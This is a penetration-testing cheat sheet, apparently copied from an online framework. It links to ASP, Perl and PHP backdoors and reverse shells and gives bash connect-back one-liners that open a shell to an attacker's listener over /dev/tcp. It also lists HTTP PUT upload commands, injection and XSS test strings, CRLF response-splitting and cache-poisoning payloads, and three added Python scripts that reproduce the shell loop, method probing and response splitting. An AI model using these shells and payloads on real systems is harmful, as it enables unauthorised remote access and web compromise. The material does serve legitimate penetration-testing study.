BiosHell

Penetration Testing Framework


Install Backdoors

ASP

http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt

Assorted

http://michaeldaw.org/projects/web-backdoor-compilation/

http://open-labs.org/hacker_webkit02.tar.gz

Perl

http://home.arcor.de/mschierlm/test/pmsh.pl

http://pentestmonkey.net/tools/perl-reverse-shell/

http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz

PHP

http://php.spb.ru/remview/

http://pentestmonkey.net/tools/php-reverse-shell/

http://pentestmonkey.net/tools/php-findsock-shell/

Python

http://matahari.sourceforge.net/

TCL

http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes

Bash Connect Back Shell

GnuCitizen

Attack Box: nc -l -p Port -vvv

Victim: $ exec 5<>/dev/tcp/IP_Address/Port

Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done

Neohapsis

Attack Box: nc -l -p Port -vvv

Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin

Victim: $ exec 1>&0 # Next we copy stdin to stdout

Victim: $ exec 2>&0 # And finally stdin to stderr

Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0

Method Testing

nc IP_Address Port

HEAD / HTTP/1.0

OPTIONS / HTTP/1.0

PROPFIND / HTTP/1.0

TRACE / HTTP/1.1

PUT http://Target_URL/FILE_NAME HTTP/1.0

POST http://Target_URL/FILE_NAME HTTP/1.x

Upload Files

curl

curl -u <username:password> -T file_to_upload <Target_URL>

curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>

put.pl

put.pl -h target -r /remote_file_name -f local_file_name

webdav

cadaver

View Page Source

Hidden Values

Developer Remarks

Extraneous Code

Passwords!

Input Validation Checks

NULL or null

Possible error messages returned.

' , " , ; , <!

Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.

-- , = , + , "

Used to craft SQL Injection queries.

` , & , ! , | , < , >

Used to find command execution vulnerabilities.

"><script>alert(1)</script>

Basic Cross-Site Scripting Checks.

%0d%0a

Carriage Return (%0d) Line Feed (%0a)

HTTP Splitting

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>

i.e. once the %xx sequences are decoded, the injected bytes read:

Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 47

<html>blah</html>

Cache Poisoning

language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>

And many more :)

Reference Link: http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html

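Added example (not part of the post above, nor of the Penetration Testing Framework it copies): the GnuCitizen connect-back loop, cat <&5 | while read line; do $line 2>&5 >&5; done, re-implemented in Python over a local socketpair so both ends of the exchange are visible without opening a listener. It shows what that loop really does: each line is only word-split (no pipes or redirects), the child's stdout and stderr are pointed at the socket, and the loop ends when the attacker closes its side. The commands sent (echo, ls on a missing path, a non-existent command) are constructed for the demonstration.

```python
"""Mechanics of 'cat <&5 | while read line; do $line 2>&5 >&5; done',
reproduced over a socketpair so the exchange runs locally (added example)."""
import shlex
import socket
import subprocess
import threading


def victim_loop(sock):
    """Victim side: read one command per line, run it with stdout and stderr
    pointed at the socket (the '2>&5 >&5' part), stop at EOF."""
    with sock.makefile("r") as lines:
        for line in lines:
            argv = shlex.split(line)  # '$line' is only word-split: no pipes, no redirects
            if not argv:
                continue
            try:
                subprocess.run(argv, stdout=sock.fileno(), stderr=sock.fileno())
            except OSError as exc:
                # bash would write its 'command not found' message to fd 5 as well
                sock.sendall(f"{argv[0]}: {exc.strerror}\n".encode())
    sock.close()


def run_commands(commands):
    """Attacker side (the 'nc -l -p Port' end): send the commands, then read
    until the victim closes the connection. Returns everything sent back."""
    attacker, victim = socket.socketpair()
    worker = threading.Thread(target=victim_loop, args=(victim,))
    worker.start()
    attacker.sendall("".join(cmd + "\n" for cmd in commands).encode())
    attacker.shutdown(socket.SHUT_WR)  # EOF ends the victim's 'while read' loop
    chunks = []
    while True:
        data = attacker.recv(4096)
        if not data:
            break
        chunks.append(data)
    worker.join()
    attacker.close()
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    # Constructed commands: a normal one, one that writes to stderr, one that does not exist
    print(run_commands(["echo hello from the victim",
                        "ls /nonexistent_dir_xyz",
                        "nosuchcommand_xyz"]))
```

The same limitation applies to the real one-liner: because the shell expands $line as a plain word list, anything that needs a shell (pipes, globbing, cd) silently does nothing useful, which is why the Neohapsis variant that hands the socket to /bin/sh itself is usually preferred.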
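Added example (not from the post or the framework it references): the "Method Testing" probes and the PUT upload step, run as a script instead of typed into nc, against a constructed in-process target. WebDAVishHandler is an assumption standing in for a misconfigured server that advertises and accepts PUT; the probe and upload functions are the part a tester would reuse. TRACE and PROPFIND are deliberately not implemented on the target, so they come back as 501, which is what an unsupported method looks like.

```python
"""HTTP method probing and PUT upload against a constructed loopback target (added example)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

PROBE_METHODS = ("HEAD", "OPTIONS", "PROPFIND", "TRACE")


class WebDAVishHandler(BaseHTTPRequestHandler):
    """Constructed target: advertises PUT in OPTIONS and keeps uploads in memory."""
    store = {}

    def log_message(self, *args):  # keep the example quiet
        pass

    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("Allow", "GET, HEAD, OPTIONS, PUT")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_HEAD(self):
        self._serve(include_body=False)

    def do_GET(self):
        self._serve(include_body=True)

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        self.store[self.path] = self.rfile.read(length)
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def _serve(self, include_body):
        body = self.store.get(self.path)
        self.send_response(200 if body is not None else 404)
        self.send_header("Content-Length", str(len(body or b"")))
        self.end_headers()
        if include_body and body:
            self.wfile.write(body)
    # no do_TRACE / do_PROPFIND: BaseHTTPRequestHandler answers 501 for those


def start_target():
    """Bind the constructed target on an ephemeral loopback port; returns (server, port)."""
    server = HTTPServer(("127.0.0.1", 0), WebDAVishHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def _request(host, port, method, path, body=None):
    conn = http.client.HTTPConnection(host, port, timeout=5)
    headers = {"Content-Length": str(len(body))} if body is not None else {}
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, resp.getheader("Allow"), data


def probe_methods(host, port, path="/"):
    """The probes the page sends by hand through nc; returns {method: (status, Allow header)}."""
    return {m: _request(host, port, m, path)[:2] for m in PROBE_METHODS}


def try_put(host, port, path, data):
    """Upload via PUT, then fetch the file back to confirm it is really served."""
    status, _, _ = _request(host, port, "PUT", path, body=data)
    _, _, fetched = _request(host, port, "GET", path)
    return status, fetched == data


if __name__ == "__main__":
    server, port = start_target()
    for method, (status, allow) in probe_methods("127.0.0.1", port).items():
        print(f"{method:9} -> {status}  Allow: {allow}")
    print("PUT /test.txt ->", try_put("127.0.0.1", port, "/test.txt", b"uploaded by pentest\n"))
    server.shutdown()
```

Point the two functions at a real host and port to reproduce the manual nc session; the GET after the PUT matters because some servers answer 201 and then never serve the file.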
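Added example (not from the post or the framework it references) for the "HTTP Splitting" and "Cache Poisoning" payloads: a constructed handler that reflects an unvalidated language parameter into a Set-Cookie header, a minimal Content-Length-driven parser of the kind a proxy or cache uses, and the one check that closes the hole. The handler, the header it reflects into and the parser are assumptions; the payload shape (empty first body, then a complete second response, optionally 304 with Last-Modified) is the page's.

```python
"""CRLF injection turning one response into two, plus the fix (added example)."""
import re
from urllib.parse import quote, unquote


def vulnerable_response(language):
    """Constructed handler: echoes the raw 'language' parameter into a Set-Cookie header."""
    return (
        "HTTP/1.1 302 Found\r\n"
        "Location: /index.html\r\n"
        "Content-Length: 0\r\n"
        f"Set-Cookie: language={language}\r\n"
        "\r\n"
    )


def hardened_response(language):
    """Same handler with the fix: a header value may never carry CR or LF."""
    if re.search(r"[\r\n]", language):
        raise ValueError("CR/LF in header value rejected")
    return vulnerable_response(language)


def splitting_payload(html, status="200 OK", extra_headers=()):
    """Build the page's payload shape: close the first response with an empty
    body, then supply a complete second response. status='304 Not Modified'
    with a Last-Modified header gives the cache-poisoning variant."""
    headers = ["Content-Type: text/html", *extra_headers, f"Content-Length: {len(html)}"]
    injected = (
        "foobar\r\nContent-Length: 0\r\n\r\n"
        f"HTTP/1.1 {status}\r\n" + "\r\n".join(headers) + f"\r\n\r\n{html}"
    )
    return quote(injected, safe="")  # as it travels in the query string


def split_responses(raw):
    """Parse a stream the way a downstream parser does: status line, headers,
    Content-Length bytes of body, then look for the next status line."""
    responses = []
    pos = 0
    while pos < len(raw):
        head_end = raw.find("\r\n\r\n", pos)
        if head_end < 0:
            break
        lines = raw[pos:head_end].split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break  # trailing junk, not a response
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        length = int(headers.get("content-length", 0))
        responses.append((lines[0], headers, raw[body_start:body_start + length]))
        pos = body_start + length
    return responses


if __name__ == "__main__":
    html = "<html>Insert undesirable content here</html>"
    param = splitting_payload(html)               # what goes on the wire
    raw = vulnerable_response(unquote(param))     # the server decodes and reflects it
    for status, headers, body in split_responses(raw):
        print(status, headers.get("content-length"), repr(body))
    try:
        hardened_response(unquote(param))
    except ValueError as exc:
        print("hardened handler:", exc)
```

The second response is the one a shared cache or the next request on the same connection gets; the 304 variant with a Last-Modified date far in the future is what keeps the poisoned entry fresh. Rejecting (or stripping) CR and LF at the header-setting boundary is the whole fix, and most modern frameworks do it for you, which is why these payloads now mostly find older or hand-rolled servers.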